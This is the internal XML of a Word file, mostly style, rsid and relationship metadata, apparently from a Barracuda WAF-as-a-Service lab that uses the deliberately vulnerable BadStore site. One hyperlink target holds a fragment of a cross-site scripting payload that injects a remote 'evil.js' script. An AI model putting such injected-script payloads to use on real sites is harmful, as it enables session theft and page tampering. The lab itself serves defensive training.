    <w:rsid w:val="75F644CB"/>
    <w:rsid w:val="75F644CB"/>
    <w:rsid w:val="75FB420C"/>
    <w:rsid w:val="76037E38"/>
    <w:rsid w:val="760B5E82"/>
    <w:rsid w:val="761A5C3B"/>
    <w:rsid w:val="7624BF4C"/>
    <w:rsid w:val="765C487B"/>
    <w:rsid w:val="768C00DF"/>
    <w:rsid w:val="76C3A6A5"/>
    <w:rsid w:val="76DA6CA8"/>
    <w:rsid w:val="76E4244B"/>
    <w:rsid w:val="76E99A79"/>
    <w:rsid w:val="76EFAAD2"/>
    <w:rsid w:val="76FD88E2"/>
    <w:rsid w:val="7706AEF5"/>
    <w:rsid w:val="77082D5C"/>
    <w:rsid w:val="7712B1F0"/>
    <w:rsid w:val="771C133F"/>
    <w:rsid w:val="771FD752"/>
    <w:rsid w:val="77303298"/>
    <w:rsid w:val="773DE6DB"/>
    <w:rsid w:val="77465FA7"/>
    <w:rsid w:val="774F63EA"/>
    <w:rsid w:val="77596C1D"/>
    <w:rsid w:val="775988C0"/>
    <w:rsid w:val="7770AD44"/>
    <w:rsid w:val="778FF361"/>
    <w:rsid w:val="77C642B9"/>
    <w:rsid w:val="77DC03C3"/>
    <w:rsid w:val="77EFD96E"/>
    <w:rsid w:val="78258144"/>
    <w:rsid w:val="785696A9"/>
    <w:rsid w:val="7857C58E"/>
    <w:rsid w:val="78E068E2"/>
    <w:rsid w:val="78E9FB9A"/>
    <w:rsid w:val="78F37B92"/>
    <w:rsid w:val="7911D2BB"/>
    <w:rsid w:val="792E2F4B"/>
    <w:rsid w:val="7930B73B"/>
    <w:rsid w:val="79502493"/>
    <w:rsid w:val="7972AB90"/>
    <w:rsid w:val="7982720D"/>
    <w:rsid w:val="798BA9CF"/>
    <w:rsid w:val="798C4362"/>
    <w:rsid w:val="79B77E6F"/>
    <w:rsid w:val="79C60CBD"/>
    <w:rsid w:val="7A0F0150"/>
    <w:rsid w:val="7A0F0150"/>
    <w:rsid w:val="7A0FD9CC"/>
    <w:rsid w:val="7A1D7C9D"/>
    <w:rsid w:val="7A222F55"/>
    <w:rsid w:val="7A2CA5A1"/>
    <w:rsid w:val="7A2F478F"/>
    <w:rsid w:val="7A2FB86E"/>
    <w:rsid w:val="7A3E4FB7"/>
    <w:rsid w:val="7A5C6F66"/>
    <w:rsid w:val="7A719957"/>
    <w:rsid w:val="7A98A0B1"/>
    <w:rsid w:val="7A9A78EF"/>
    <w:rsid w:val="7ABF52B7"/>
    <w:rsid w:val="7ACBD262"/>
    <w:rsid w:val="7ADBD198"/>
    <w:rsid w:val="7AFA4DA6"/>
    <w:rsid w:val="7B06AB01"/>
    <w:rsid w:val="7B2F63E7"/>
    <w:rsid w:val="7B48C1E9"/>
    <w:rsid w:val="7B5A720D"/>
    <w:rsid w:val="7B61DD1E"/>
    <w:rsid w:val="7B6C6BD2"/>
    <w:rsid w:val="7B71C35C"/>
    <w:rsid w:val="7B71C35C"/>
    <w:rsid w:val="7B8DCEA7"/>
    <w:rsid w:val="7B8DCEA7"/>
    <w:rsid w:val="7B90486C"/>
    <w:rsid w:val="7C0F6BAF"/>
    <w:rsid w:val="7C1471E0"/>
    <w:rsid w:val="7C38D84B"/>
    <w:rsid w:val="7C6A8760"/>
    <w:rsid w:val="7C9CABFB"/>
    <w:rsid w:val="7CAEA08B"/>
    <w:rsid w:val="7CFDAD7F"/>
    <w:rsid w:val="7CFE1B18"/>
    <w:rsid w:val="7D116EAA"/>
    <w:rsid w:val="7D556D9A"/>
    <w:rsid w:val="7D670F09"/>
    <w:rsid w:val="7D9737B3"/>
    <w:rsid w:val="7DB2AD81"/>
    <w:rsid w:val="7DD4E0AE"/>
    <w:rsid w:val="7DD5B890"/>
    <w:rsid w:val="7DD99FAE"/>
    <w:rsid w:val="7DE87A16"/>
    <w:rsid w:val="7E0BC734"/>
    <w:rsid w:val="7E393629"/>
    <w:rsid w:val="7E472793"/>
    <w:rsid w:val="7E776988"/>
    <w:rsid w:val="7E8062AB"/>
    <w:rsid w:val="7E8062AB"/>
    <w:rsid w:val="7E8B19AC"/>
    <w:rsid w:val="7E93E27A"/>
    <w:rsid w:val="7ED8AA5E"/>
    <w:rsid w:val="7F0F18B4"/>
    <w:rsid w:val="7F14FCFA"/>
    <w:rsid w:val="7F1B87F9"/>
    <w:rsid w:val="7F4EBA98"/>
    <w:rsid w:val="7F618BD4"/>
    <w:rsid w:val="7F685D52"/>
    <w:rsid w:val="7F698058"/>
    <w:rsid w:val="7F813D74"/>
    <w:rsid w:val="7F981A1E"/>
    <w:rsid w:val="7FA989B1"/>
    <w:rsid w:val="7FD147B7"/>
    <w:rsid w:val="7FFCB20D"/>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CA8F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C0AFBE99-DD7A-4C97-8BA5-9CE15BB5C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F558A"/>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01EA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="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D01EA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="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01EA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="3"/>
      <w15:collapsed/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F91"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1D4841"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00670816"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00544AC0"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B1ABD"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="004B6A8F"/>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B6A8F"/>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B6A8F"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:after="160"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtitleChar" w:customStyle="1">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="004B6A8F"/>
    <w:rPr>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading1Char" w:customStyle="1">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002F558A"/>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7D01EA"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading3Char" w:customStyle="1">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007D01EA"/>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rsid w:val="007D01EA"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="003B48A4"/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:color="auto" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="160"/>
      <w:ind w:left="864" w:right="864"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="QuoteChar" w:customStyle="1">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003B48A4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00163BC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63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54298">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="50159962">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="458841338">
          <w:marLeft w:val="1800"/>
          <w:marRight w:val="1800"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="180755041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99256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customXml" Target="../customXml/item2.xml" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item4.xml" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://badstore.cudathon.com/" TargetMode="External" Id="Rfa309458df8b4bb7" /><Relationship Type="http://schemas.microsoft.com/office/2019/09/relationships/intelligence" Target="/word/intelligence.xml" Id="R6881ba4d214f4dce" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://badstore.cudathon.com" TargetMode="External" Id="R12619753ee6a46a7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://badstore.cudathon.com" TargetMode="External" Id="R167b0c158ac74f6e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://waas.barracudanetworks.com/" TargetMode="External" Id="Rd1230d50ea4b4613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://badstore.cudathon.com" TargetMode="External" Id="Rc37adbdf4fed45f8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://campus.barracuda.com/product/WAAS/doc/77399164/getting-started" TargetMode="External" Id="R888183bef2584c59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://campus.barracuda.com/product/WAAS/doc/91129005/understanding-deployment-locations/?sl=AXe3KDmUQVmzFRmBUd_j&amp;so=1" TargetMode="External" Id="R7af2cf586e5a43cf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://badstore.cudathon.com/cgi-bin/badstore.cgi?action=admin" TargetMode="External" Id="R8de21f1b86c3472e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://badstore.cudathon.com/cgi-bin/badstore.cgi?action=admin" TargetMode="External" Id="R20c7eb8b29de41b2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:test@test.com" TargetMode="External" Id="R29d7d17a946a40ad" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://badstore.cudathon.com" TargetMode="External" Id="Rf0c96b908b8c40e7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://badstore.cudathon.com" TargetMode="External" Id="R7ed3d70ed04f4c76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s3.amazonaws.com/nmiron-sko20-labs/pricelist.dat" TargetMode="External" Id="R9742763ba0974c60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1d.png" Id="Rb40b2c8120884639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1e.png" Id="R36edd46393df45ad" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1f.png" Id="R4063e5fb10f049ac" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image20.png" Id="Rdf21db53f32c4811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2f.png" Id="Rf054565fa99e4364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://campus.barracuda.com/product/WAAS/doc/76284376/endpoints" TargetMode="External" Id="R549a3f4da168404f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image30.png" Id="R3a62714b80e44443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image31.png" Id="R8855ec50a38e463a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image32.png" Id="Re7528c8e191c4a88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image33.png" Id="Rbf0ea0fde0b64c7c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image38.png" Id="Rdb342e0a819f4332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image39.png" Id="R5360396407184688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3a.png" Id="R479d6bc8866d45fb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.jpg" Id="Rebe092984cf140e8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3b.png" Id="R49ee8391588744b3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3c.png" Id="Rfe0c71b5fcb54bfe" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3d.png" Id="R3ef36ad9cde74f10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image41.png" Id="R2c9cff686d3d456f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image42.png" Id="R79eb8521204b4d15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image43.png" Id="R80057c77b73e47cd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image45.png" Id="R197955a01daa49aa" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4a.png" Id="R393a05e4146b4cbe" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4c.png" Id="R83d0eaea39d648f5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4d.png" Id="R6ad1cfb519234e34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4e.png" Id="Ra6fc7b7d55b24f90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4f.png" Id="R91c6ba192f814650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image50.png" Id="R411c33eb92a246be" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image51.png" Id="R021bd5a8443742a9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image52.png" Id="R44234863537f46a5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://barracuda.slack.com//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s)" TargetMode="External" Id="Rbada9e71f0e44938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image53.png" Id="R6e27861bcc904e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98DB6DB9E9A5A4CB3BEAE51B1DE4187" ma:contentTypeVersion="6" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="378fab6fbf90f7f0e9204e81e916b1fb">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="cc031a03-b3ee-448c-89ec-a9dba7248368" xmlns:ns3="a7fccbc4-b1de-4cd0-b913-725fd0ffe0a5" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="43c5357e50de3b8aeeab486062a9fc96" ns2:_="" ns3:_="">
    <xsd:import namespace="cc031a03-b3ee-448c-89ec-a9dba7248368"/>
    <xsd:import namespace="a7fccbc4-b1de-4cd0-b913-725fd0ffe0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031a03-b3ee-448c-89ec-a9dba72483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ccbc4-b1de-4cd0-b913-725fd0ffe0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410CA25-C91B-4F5B-87E9-9CB6F8B36B88}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{482782E2-121F-45D7-BF02-7ACDFEDAF424}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{940A9514-F76F-4911-BCAF-8AED2A84E645}"/>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3F1A5075-8B51-4648-B94A-AD7AB81C485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enyu Zhang</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Brett Wolmarans</lastModifiedBy>
  <revision>48</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-06T14:13:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-19T17:26:23.15952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8DB6DB9E9A5A4CB3BEAE51B1DE4187</vt:lpwstr>
  </property>
</Properties>
</file>